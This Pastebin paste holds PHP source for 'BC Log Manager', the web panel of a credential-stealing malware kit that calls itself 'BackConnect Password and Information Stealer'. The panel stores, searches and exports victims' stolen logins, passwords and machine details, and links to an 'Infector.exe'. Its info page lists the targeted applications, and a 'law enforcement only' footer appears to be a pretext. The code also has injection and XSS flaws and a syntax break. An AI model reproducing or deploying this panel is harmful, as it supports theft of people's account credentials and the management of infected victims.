API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jul 27th, 2017
89
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 24.41 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2.  
  3. include 'config.php';
  4.  
  5. // ********************************************************************************************
  6.  
  7. $html = "<html><head><title>BC Log Manager - ";
  8. $header = "</title><link rel='stylesheet' type='text/css' href='style.css'/></head><body>
  9. <div id='web'><div id='header'><b>Jak se máš ".$username."?</b></div><div id='navigation'><ul>
  10. <li><a href='?action=logs'>All Logs</a></li><li><a href='?action=search'>Search</a></li>
  11. <li><a href='?action=suspects'>Suspects</a></li>
  12. <li><a href='?action=export'>Export</a></li>
  13. <li><a href='?action=info'>Information</a></li>
  14. <li><a href='?action=logout'>Logout</a></li>
  15. </ul></div><br>";
  16. $footer = "<div id='footer'>(C) 2010 - FOR LAW ENFORCEMENTS ONLY. United States law applies.</div></div></body></html>";
  17. $searchform = "<form name='search' method='POST' action='?action=search'>
  18. Search for: <input type='text' name='q' size='20' value='".htmlspecialchars($_POST["q"])."'> In: <select name='in'>
  19. <option value='1' selected='selected'>Url</option><option value='2'>Username</option>
  20. <option value='3'>Password</option><option value='4'>Computer ID</option>
  21. <option value='5'>Date</option><option value='6'>IP</option></select>
  22. <input type='submit' value='Search' name='search'></form>";
  23. $exportform1 = "<form name='search' method='POST' action='?action=export'><select name='in'>";
  24. $exportform2 = "</select> <input type='submit' value='Export' name='Export'></form>";
  25. $loginform = "<form id='loginform' name='frm' method='POST' action='?action=login'>
  26. <table id='logintable' cellpadding='2' cellspacing='0' border='0'>
  27. <tr><td>Username:</td><td><input type='text' name='username' size='20'></td></tr>
  28. <tr><td>Password:</td><td><input type='password' name='password' size='20'></td></tr>
  29. <tr><td></td><td><input type='submit' value='Login' name='login'></td></tr></form>";
  30. $javascript = "<script language='javascript' type='text/javascript'>
  31. function CheckElements1() { chk = document.getElementsByName('sel1[]');
  32. for (i = 0; i<chk.length; i++) { if (document.frm.elements['check_sel1'].checked) chk[i].checked = true; else chk[i].checked = false;}}
  33. function CheckElements2() { chk = document.getElementsByName('sel2[]');
  34. for (i = 0; i<chk.length; i++) { if (document.frm.elements['check_sel2'].checked) chk[i].checked = true; else chk[i].checked = false;}}
  35. function ConfirmElements1() { chk = document.getElementsByName('sel1[]');
  36. for (i = 0; i<chk.length; i++) { if (chk[i].checked == true) { return confirm('Are you sure you want to delete all selected logs?');}}
  37. alert('At least one option must be select.'); return false;}
  38. function ConfirmElements2() { chk = document.getElementsByName('sel2[]');
  39. for (i = 0; i<chk.length; i++) { if (chk[i].checked == true) { return confirm('Are you sure you want to delete all selected logs?');}}
  40. alert('At least one option must be select.'); return false;}
  41. function ConfirmElements12() {
  42. chk1 = document.getElementsByName('sel1[]');
  43. chk2 = document.getElementsByName('sel2[]');
  44. for (i = 0; i<chk1.length; i++) { if (chk1[i].checked == true) { return confirm('Are you sure you want to delete all selected logs?'); }}
  45. for (i = 0; i<chk2.length; i++) { if (chk2[i].checked == true) { return confirm('Are you sure you want to delete all selected logs?'); }}
  46. alert('At least one option must be select.'); return false;
  47. }
  48. function ConfirmElements12Evidence() {
  49. chk1 = document.getElementsByName('sel1[]');
  50. chk2 = document.getElementsByName('sel2[]');
  51. for (i = 0; i<chk1.length; i++) { if (chk1[i].checked == true) { return true; }}
  52. for (i = 0; i<chk2.length; i++) { if (chk2[i].checked == true) { return true; }}
  53. alert('At least one option must be select.'); return false;
  54. }
  55. </script>";
  56. $cols = array("program", "url", "login", "pass", "compid", "date", "ip");
  57. $cols2 = array("compid", "os", "computer", "user", "install", "date", "ip", "country");
  58.  
  59. // FUNCTIONS ******************************************************************************
  60. function connect_database() {
  61. global $dbHost, $dbUser, $dbPass, $dbDatabase, $html, $header, $footer;
  62. $mysql = mysql_connect($dbHost, $dbUser, $dbPass);
  63. if (!$mysql) {
  64. $html .= "Database Error".$header."Can not connect to database, please check the configuration.".$footer;
  65. die($html);
  66. }
  67. if (!mysql_select_db($dbDatabase, $mysql)) {
  68. mysql_close($mysql);
  69. $html .= "Database Error".$header."Can not select '".$dbDatabase."' database, please check the configuration.".$footer;
  70. die($html);
  71. }
  72. return $mysql;
  73. }
  74. function pages_number($logstotal, $logspage, $page, $site) {
  75. $pagesnumber = ceil($logstotal/$logspage);
  76. $temp = "Pages: ";
  77. for ($i=0; $i<$pagesnumber; $i++) {
  78. if ($_SESSION[$page] == $i)
  79. $temp .= " <span class='page1'>".$i."</span>";
  80. else
  81. $temp .= " <span class='page0'><a href='?action=".$site."&".$page."=".$i."'>".$i."</a></span>";
  82. }
  83. $temp .= " Results ".($_SESSION[$page]*$logspage)." - ".(($_SESSION[$page]*$logspage)+$logspage)." of about ".$logstotal;
  84. return $temp;
  85. }
  86. function sort_order() {
  87. if ($_SESSION["order"] == 0) $tmp = "ASC"; else $tmp = "DESC";
  88. return $tmp;
  89. }
  90.  
  91. // LOGIN **************************************************************************************
  92. session_start();
  93. if ($_SESSION["user"]!=$username || $_SESSION["ip"]!=$_SERVER["REMOTE_ADDR"]) {
  94. if ($_GET["action"] == "login") {
  95. if (isset($_POST["username"]) && isset($_POST["password"]) && $username==$_POST["username"] && $password==$_POST["password"]) {
  96. session_start();
  97. $_SESSION["user"] = $username;
  98. $_SESSION["ip"] = $_SERVER["REMOTE_ADDR"];
  99. $_SESSION["sort"] = 5;
  100. $_SESSION["sort2"] = 5;
  101. $_SESSION["order"] = 1;
  102. $_SESSION["page"] = 0;
  103. $_SESSION["page2"] = 0;
  104.  
  105. $mysql = connect_database();
  106. $result = mysql_query("SELECT COUNT(*) FROM `logs`;", $mysql);
  107. if (!$result) {
  108. $html .= "Database Error".$header."Table 'logs' not present, please run the installation script first.".$footer;
  109. die($html);
  110. }
  111. $result = mysql_query("SELECT COUNT(*) FROM `suspects`;", $mysql);
  112. if (!$result) {
  113. $html .= "Database Error".$header."Table 'suspects' not present, please run the installation script first.".$footer;
  114. die($html);
  115. }
  116. mysql_close($mysql);
  117. header("Location: ?action=logs");
  118. } else {
  119. $html = "<html><head><title>Login Error</title><link rel='stylesheet' type='text/css' href='style.css'/></head><body>".$loginform."</body></html>";
  120. echo $html;
  121. exit;
  122. }
  123. } else {
  124. $html = "<html><head><title>Login</title><link rel='stylesheet' type='text/css' href='style.css'/></head><body>".$loginform."</body></html>";
  125. echo $html;
  126. exit;
  127. }
  128. }
  129.  
  130. // LOGOUT ************************************************************************************
  131. if ($_GET["action"] == "logout") {
  132. unset($_SESSION["user"]);
  133. unset($_SESSION["ip"]);
  134. unset($_SESSION["sort"]);
  135. unset($_SESSION["sort2"]);
  136. unset($_SESSION["order"]);
  137. unset($_SESSION["page"]);
  138. unset($_SESSION["page2"]);
  139. session_unset();
  140. header("Location: index.php");
  141.  
  142. // LOGS **************************************************************************************
  143. } elseif ($_GET["action"] == "logs" || !isset($_GET["action"])) {
  144.  
  145. if (isset($_GET["sort"]) && $_GET["sort"]>=0 && $_GET["sort"]<=6) {
  146. if ($_SESSION["sort"] == $_GET["sort"])
  147. if ($_SESSION["order"] == 0) $_SESSION["order"] = 1; else $_SESSION["order"] = 0; else $_SESSION["sort"] = $_GET["sort"];
  148. }
  149.  
  150. $mysql = connect_database();
  151. $result = mysql_query("SELECT COUNT(*) FROM `logs` WHERE `program` != 14 ;", $mysql);
  152. $logstotal = mysql_result($result, 0);
  153. if ($logstotal > 0) {
  154. if (isset($_GET["page"]) && is_numeric($_GET["page"]) && $_GET["page"]>=0 && $_GET["page"]<=ceil($logstotal/$logspage))
  155. $_SESSION["page"] = $_GET["page"];
  156.  
  157. $result = mysql_query("SELECT * FROM `logs` WHERE `program` != 14 ORDER BY `".$cols[$_SESSION["sort"]]."` ".sort_order()." LIMIT ".($logspage*$_SESSION["page"])." , ".$logspage.";", $mysql);
  158. if (!$result) die(mysql_error());
  159.  
  160. $html .= "Logs".$header.$javascript."
  161. <form name='frm' method='POST' action='?action=selected'>
  162. <table id='logstable' cellpadding='2' cellspacing='0' border='0'><tr id='row0'>
  163. <td><a href='?action=logs&sort=0'>Program</a></td><td><a href='?action=logs&sort=1'>Url</a></td>
  164. <td><a href='?action=logs&sort=2'>Username</a></td><td><a href='?action=logs&sort=3'>Password</a></td>
  165. <td><a href='?action=logs&sort=4'>Computer ID</a></td><td><a href='?action=logs&sort=5'>Date</a></td>
  166. <td><a href='?action=logs&sort=6'>IP</a></td>
  167. <td><input type='checkbox' name='check_sel1' onClick='CheckElements1();'></td></tr>";
  168. $i = 0;
  169. while ($row = mysql_fetch_array($result)) {
  170. if ($row["program"] != 14) { // dont display key info here
  171. $html .= "<tr class='";
  172. if ($i % 2 == 0) $html .= "row1"; else $html .= "row2";
  173. $html .= "'><td>".$aplications[$row["program"]]."</td>";
  174. $html .= "<td><a href='".$row["url"]."' target='_blanc'>".$row["url"]."</a></td><td>".$row["login"]."</td><td>".$row["pass"]."</td>";
  175. $html .= "<td><a href='?action=search&q=".$row["compid"]."'>".$row["compid"]."</a></td><td>".$row["date"]."</td><td>".$row["ip"]."</td>";
  176. $html .= "<td><input type='checkbox' name='sel1[]' value='".$row["id"]."'></td></tr>";
  177. $i++;
  178. }
  179. }
  180. $html .= "</table><div id='pages'><div id='numbers'>".pages_number($logstotal, $logspage, "page", "logs").
  181. "</div><input id='delete' name='buttonact' type='submit' value='Delete Selected' onclick='if (!ConfirmElements1()) return false;'></div></form>".$footer;
  182. } else {
  183. $html .= "Logs".$header."No logs found!".$footer;
  184. }
  185. mysql_close($mysql);
  186. echo $html;
  187.  
  188. // SEARCH ************************************************************************************
  189. } elseif ($_GET["action"] == "search") {
  190. if (isset($_GET["q"])) { $_POST["q"] = $_GET["q"]; $_POST["in"] = 4; /* for suspect-search link */ }
  191. if (isset($_POST["q"]) && isset($_POST["in"]) && is_numeric($_POST["in"]) && $_POST["in"]>0 && $_POST["in"]<=6) {
  192. $mysql = connect_database();
  193.  
  194. // list detailed info of suspect (if comp-id is given)
  195. if ($_POST["in"] == 4)
  196. {
  197. $result1 = mysql_query("SELECT * FROM `logs` WHERE `".mysql_real_escape_string($cols[$_POST["in"]], $mysql)."` = '".mysql_real_escape_string($_POST["q"], $mysql)."';", $mysql);
  198. $result2 = mysql_query("SELECT * FROM `suspects` WHERE ".mysql_real_escape_string($cols[$_POST["in"]], $mysql)." = '".mysql_real_escape_string($_POST["q"], $mysql)."' ORDER BY date ASC;", $mysql);
  199. if (!$result1 || !$result2) die(mysql_error());
  200. if (mysql_num_rows($result1) == 0 && mysql_num_rows($result2) == 0)
  201. {
  202. $html .= "Search".$header.$searchform."<br>No results found!";
  203. die($html);
  204. }
  205. }
  206.  
  207. // otherwise normal search in logs table
  208. else
  209. {
  210. $result1 = mysql_query("SELECT * FROM `logs` WHERE `".mysql_real_escape_string($cols[$_POST["in"]], $mysql)."` LIKE '%".mysql_real_escape_string($_POST["q"], $mysql)."%';", $mysql);
  211. if (!$result1) die(mysql_error());
  212. if (mysql_num_rows($result1) == 0)
  213. {
  214. $html .= "Search".$header.$searchform."<br>No results found!";
  215. die($html);
  216. }
  217. }
  218.  
  219. $html .= "Search".$header.$javascript.$searchform."<form name='frm' method='POST' action='?action=selected'>";
  220.  
  221. // display the suspects table
  222. if ($_POST["in"] == 4 && mysql_num_rows($result2) > 0) {
  223. $html .= "
  224. <table id='searchtable' cellpadding='2' cellspacing='0' border='0'><tr id='row0'>
  225. <td>Computer ID</td><td>OS</td>
  226. <td>Computer</td><td>User</td>
  227. <td>Installation</td><td>Date</td>
  228. <td>IP</td><td>Country</td>
  229. <td><input type='checkbox' name='check_sel2' onClick='CheckElements2();'>".
  230. "<input type='hidden' name='in' value='".htmlspecialchars($_POST["in"])."'>".
  231. "<input type='hidden' name='q' value='".htmlspecialchars($_POST["q"])."'>".
  232. "</td></tr>";
  233. $i = 0;
  234. while ($row = mysql_fetch_array($result2)) {
  235. $html .= "<tr class='";
  236. if ($i % 2 == 0) $html .= "row1"; else $html .= "row2";
  237. $html .= "'><td>".$row["compid"]."</td><td>".$row["os"]."</td><td>".$row["computer"]."</td><td>".$row["user"]."</td>";
  238. $html .= "<td>".$installation[$row["install"]]."</td><td>".$row["date"]."</td><td>".$row["ip"]."</td><td>".$row["country"]."</td>";
  239. $html .= "<td><input type='checkbox' name='sel2[]' value='".$row["id"]."'></td></tr>";
  240. $i++;
  241. }
  242. $html .= "</table><br>";
  243. }
  244.  
  245. // display the log table
  246. if (mysql_num_rows($result1) > 0) {
  247. $html .= "
  248. <table id='searchtable' cellpadding='2' cellspacing='0' border='0'><tr id='row0'>
  249. <td>Program</td><td>Url</td>
  250. <td>Username</td><td>Password</td>
  251. <td>Computer ID</td><td>Date</td>
  252. <td>IP</td>
  253. <td><input type='checkbox' name='check_sel1' onClick='CheckElements1();'>".
  254. "<input type='hidden' name='in' value='".htmlspecialchars($_POST["in"])."'>".
  255. "<input type='hidden' name='q' value='".htmlspecialchars($_POST["q"])."'>".
  256. "</td></tr>";
  257. $i = 0;
  258. while ($row = mysql_fetch_array($result1)) {
  259. $html .= "<tr class='";
  260. if ($i % 2 == 0) $html .= "row1"; else $html .= "row2";
  261. $html .= "'><td>".$aplications[$row["program"]]."</td>";
  262. $html .= "<td><a href='".$row["url"]."' target='_blanc'>".$row["url"]."</a></td><td>".$row["login"]."</td><td>".$row["pass"]."</td>";
  263. $html .= "<td>".$row["compid"]."</td><td>".$row["date"]."</td><td>".$row["ip"]."</td>";
  264. $html .= "<td><input type='checkbox' name='sel1[]' value='".$row["id"]."'></td></tr>";
  265. $i++;
  266. }
  267. $html .= "</table>";
  268. }
  269.  
  270. // page numbers and delete button
  271. $html .= "<div id='pages'><div id='numbers'>".mysql_num_rows($result1)." results for '".$_POST["q"]."'</div><div id='delete'>".
  272. "<input name='buttonact' type='submit' value='Export Evidence' onclick='if (!ConfirmElements12Evidence()) return false;'>&nbsp;".
  273. "<input name='buttonact' type='submit' value='Delete Selected' onclick='if (!ConfirmElements12()) return false;'>".
  274. "</div></div></form>";
  275.  
  276. $html .= $footer;
  277. mysql_close($mysql);
  278. } else {
  279. $html .= "Logs".$header.$searchform.$footer;
  280. }
  281. echo $html;
  282.  
  283. // SELECTED **************************************************************************************
  284. } elseif ($_GET["action"] == "selected") {
  285. if (isset($_POST["buttonact"])) {
  286.  
  287. // DELETE SELECTED ***********************************************************************
  288. if ($_POST["buttonact"] == "Delete Selected") {
  289.  
  290. // delete entries from logs table (selection 1)
  291. if (isset($_POST["sel1"]) && count($_POST["sel1"])!=0) {
  292. $mysql = connect_database();
  293. $query = "DELETE FROM `logs` WHERE";
  294. for ($i=0; $i<count($_POST["sel1"]); $i++) {
  295. if (is_numeric($_POST["sel1"][$i]))
  296. $query .= " `id` = ".mysql_real_escape_string($_POST["sel1"][$i], $mysql)." OR";
  297. }
  298. $query .= ';';
  299. $query = str_replace(' OR;', ';', $query);
  300. $result = mysql_query($query, $mysql);
  301. if (!$result) die(mysql_error());
  302. mysql_close($mysql);
  303. }
  304.  
  305. // delete entries from suspects table (selection 2)
  306. if (isset($_POST["sel2"]) && count($_POST["sel2"])!=0) {
  307. $mysql = connect_database();
  308. $query = "DELETE FROM `suspects` WHERE";
  309. for ($i=0; $i<count($_POST["sel2"]); $i++) {
  310. if (is_numeric($_POST["sel2"][$i]))
  311. $query .= " `id` = ".mysql_real_escape_string($_POST["sel2"][$i], $mysql)." OR";
  312. }
  313. $query .= ';';
  314. $query = str_replace(' OR;', ';', $query);
  315. $result = mysql_query($query, $mysql);
  316. if (!$result) die(mysql_error());
  317. mysql_close($mysql);
  318. }
  319.  
  320. if (isset($_POST["q"]) && isset($_POST["in"])) // return to search, suspects or logs
  321. elseif (isset($_POST["sel2"]) && count($_POST["sel2"])!=0)
  322. header("Location: ?action=suspects");
  323. else
  324. header("Location: ?action=logs");
  325.  
  326. // EXPORT SELECTED ***********************************************************************
  327. } elseif ($_POST["buttonact"] == "Export Evidence" && isset($_POST["q"])) {
  328. header("Content-Type: text/plain");
  329. header("Content-Disposition: Attachment; filename=evidence ".$_POST["q"].".txt");
  330. header("Pragma: no-cache");
  331.  
  332. echo "\r\n BackConnect Password and Information Stealer\r\n Evidence Report\r\n ================================================\r\n";
  333.  
  334. // logs table
  335. if (isset($_POST["sel1"]) && count($_POST["sel1"])!=0) {
  336. $mysql = connect_database();
  337. $query = "SELECT * FROM `logs` WHERE";
  338. for ($i=0; $i<count($_POST["sel1"]); $i++) {
  339. if (is_numeric($_POST["sel1"][$i]))
  340. $query .= " `id` = ".$_POST["sel1"][$i]." OR";
  341. }
  342. $query .= ';';
  343. $query = str_replace(' OR;', ';', $query);
  344. $result = mysql_query($query, $mysql);
  345. if (!$result) die(mysql_error());
  346. echo "\r\n\r\n";
  347. while ($row = mysql_fetch_array($result)) {
  348. echo "Program: ".$aplications[$row['program']]."\r\n";
  349. echo "Url/Host: ".$row['url']."\r\n";
  350. echo "Login: ".$row['login']."\r\n";
  351. echo "Password: ".$row['pass']."\r\n";
  352. echo "Computer ID: ".$row['compid']."\r\n";
  353. echo "Date: ".$row['date']."\r\n";
  354. echo "IP: ".$row['ip']."\r\n";
  355. echo "----------------------------------------------------------\r\n";
  356. }
  357. mysql_close($mysql);
  358. }
  359.  
  360. // suspects table
  361. if (isset($_POST["sel2"]) && count($_POST["sel2"])!=0) {
  362. $mysql = connect_database();
  363. $query = "SELECT * FROM `suspects` WHERE";
  364. for ($i=0; $i<count($_POST["sel2"]); $i++) {
  365. if (is_numeric($_POST["sel2"][$i]))
  366. $query .= " `id` = ".$_POST["sel2"][$i]." OR";
  367. }
  368. $query .= ';';
  369. $query = str_replace(' OR;', ';', $query);
  370. $result = mysql_query($query, $mysql);
  371. if (!$result) die(mysql_error());
  372. echo "\r\n\r\n";
  373. while ($row = mysql_fetch_array($result)) {
  374. echo "Computer ID: ".$row['compid']."\r\n";
  375. echo "OS: ".$row['os']."\r\n";
  376. echo "Computer: ".$row['computer']."\r\n";
  377. echo "User: ".$row['user']."\r\n";
  378. echo "Installation: ".$installation[$row["install"]]."\r\n";
  379. echo "Date: ".$row['date']."\r\n";
  380. echo "IP: ".$row['ip']."\r\n";
  381. echo "Country: ".$row['country']."\r\n";
  382. echo "Host: ".$row['host']."\r\n";
  383. echo "----------------------------------------------------------\r\n";
  384. }
  385. mysql_close($mysql);
  386. }
  387.  
  388. }
  389.  
  390. }
  391.  
  392. // SUSPECTS **********************************************************************************
  393. } elseif ($_GET["action"] == "suspects") {
  394.  
  395. if (isset($_GET["sort"]) && $_GET["sort"]>=0 && $_GET["sort"]<=7) {
  396. if ($_SESSION["sort2"] == $_GET["sort"])
  397. if ($_SESSION["order"] == 0) $_SESSION["order"] = 1; else $_SESSION["order"] = 0; else $_SESSION["sort2"] = $_GET["sort"];
  398. }
  399.  
  400. $mysql = connect_database();
  401. $result = mysql_query("SELECT COUNT(*) FROM suspects WHERE install <> ".$InstallCodeRestart.";", $mysql);
  402. $logstotal = mysql_result($result, 0);
  403. if ($logstotal > 0) {
  404. if (isset($_GET["page2"]) && is_numeric($_GET["page2"]) && $_GET["page2"]>=0 && $_GET["page2"]<=ceil($logstotal/$logspage))
  405. $_SESSION["page2"] = $_GET["page2"];
  406.  
  407. $result = mysql_query("SELECT * FROM suspects WHERE install <> ".$InstallCodeRestart." ORDER BY ".$cols2[$_SESSION["sort2"]]." ".sort_order()." LIMIT ".($logspage*$_SESSION["page2"])." , ".$logspage.";", $mysql);
  408. if (!$result) die(mysql_error());
  409.  
  410. $html .= "Suspects".$header.$javascript."
  411. <form name='frm' method='POST' action='?action=selected'>
  412. <table id='logstable' cellpadding='2' cellspacing='0' border='0'><tr id='row0'>
  413. <td><a href='?action=suspects&sort=0'>Computer ID</a></td><td><a href='?action=suspects&sort=1'>OS</a></td>
  414. <td><a href='?action=suspects&sort=2'>Computer</a></td><td><a href='?action=suspects&sort=3'>User</a></td>
  415. <td><a href='?action=suspects&sort=4'>Installation</a></td><td><a href='?action=suspects&sort=5'>Date</a></td>
  416. <td><a href='?action=suspects&sort=6'>IP</a></td><td><a href='?action=suspects&sort=7'>Country</a></td>
  417. <td><input type='checkbox' name='check_sel2' onClick='CheckElements2();'></td></tr>";
  418. $i = 0;
  419. while ($row = mysql_fetch_array($result)) {
  420. $html .= "<tr class='";
  421. if ($i % 2 == 0) $html .= "row1"; else $html .= "row2";
  422. $html .= "'><td><a href='?action=search&q=".$row["compid"]."'>".$row["compid"]."</a></td><td>".$row["os"]."</td><td>".$row["computer"]."</td><td>".$row["user"]."</td>";
  423. $html .= "<td>".$installation[$row["install"]]."</td><td>".$row["date"]."</td><td>".$row["ip"]."</td><td>".$row["country"]."</td>";
  424. $html .= "<td><input type='checkbox' name='sel2[]' value='".$row["id"]."'></td></tr>";
  425. $i++;
  426. }
  427. $html .= "</table><div id='pages'><div id='numbers'>".pages_number($logstotal, $logspage, "page2", "suspects")."</div>".
  428. "<input id='delete' name='buttonact' type='submit' value='Delete Selected' onclick='if (!ConfirmElements2()) return false;'></div></form>".$footer;
  429. } else {
  430. $html .= "Suspects".$header."No suspects found!".$footer;
  431. }
  432. mysql_close($mysql);
  433. echo $html;
  434.  
  435. // EXPORT ************************************************************************************
  436. } elseif ($_GET["action"] == "export") {
  437.  
  438. if (isset($_POST["in"]) && is_numeric($_POST["in"]) && $_POST["in"] < $ApplicationCount) {
  439. $mysql = connect_database();
  440. $query = "SELECT * FROM `logs` WHERE `program` =".mysql_real_escape_string($_POST["in"], $mysql).";";
  441. $result = mysql_query($query, $mysql);
  442. if (!$result) die(mysql_error());
  443. header("Content-Type: text/plain");
  444. header("Content-Disposition: Attachment; filename=log ".$aplications[$_POST["in"]].".txt");
  445. header("Pragma: no-cache");
  446. while ($row = mysql_fetch_array($result)) {
  447. echo "Program: ".$aplications[$row['program']]."\r\n";
  448. echo "Url/Host: ".$row['url']."\r\n";
  449. echo "Login: ".$row['login']."\r\n";
  450. echo "Password: ".$row['pass']."\r\n";
  451. echo "Computer ID: ".$row['compid']."\r\n";
  452. echo "Date: ".$row['date']."\r\n";
  453. echo "IP: ".$row['ip']."\r\n";
  454. echo "----------------------------------------------------------\r\n";
  455. }
  456. mysql_close($mysql);
  457. $mysql = connect_database();
  458.  
  459. mysql_close($mysql);
  460. } else {
  461. for ($i = 0; $i < $ApplicationCount; $i++)
  462. $exportform1 .= "<option value='".$i."'>".$aplications[$i]."</option>";
  463. $html .= "Logs".$header.$exportform1.$exportform2.$footer;
  464. echo $html;
  465. }
  466.  
  467. // INFORMATION **********************************************************************************
  468. } elseif ($_GET["action"] == "info") {
  469.  
  470. $html .= "Information".$header;
  471. $html .= "Version: 1.3<br>Date: -<br><br>This is BackConnect. ".
  472. "For any questions and upgrades, please contact -. This copy is registered to: - Click on a computer id to show the complete collected evidence.<br><br>".
  473. "It steals following information:<br>* MSN<br>* Google Talk<br>* Trillian<br>* Pidgin<br>".
  474. "* Paltalk<br>* Steam<br>* No-IP<br>* DynDNS<br>* Firefox (all versions)<br>* Internet Explorer (unreliable)<br>".
  475. "* FileZilla<br>* FlashFXP<br>* Keys from various games and software<br>* Outlook (old versions)<br>* IMVU<br>* Internet Download Manager<br>* Chrome (< 2010)".
  476. "<br>* RapidShare Downloader<br>* SmartFTP<br>* CoreFTP<br>* FTP Commander<br>* Total Commander<br>* Protected Storage<br><br>".
  477. "For further information and legal information please read the readme.<br><br>".
  478. "<a href='/downloads/Infector.exe'>Link to your Infector.exe</a><br><a href='/downloads/Disinfector.exe'>Link to your Disinfector.exe</a><br><br>";
  479. $html .= $footer;
  480. echo $html;
  481.  
  482. // Unknown ***********************************************************************************
  483. } else {
  484. $html .= $header.$footer;
  485. echo $html;
  486. }
  487. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!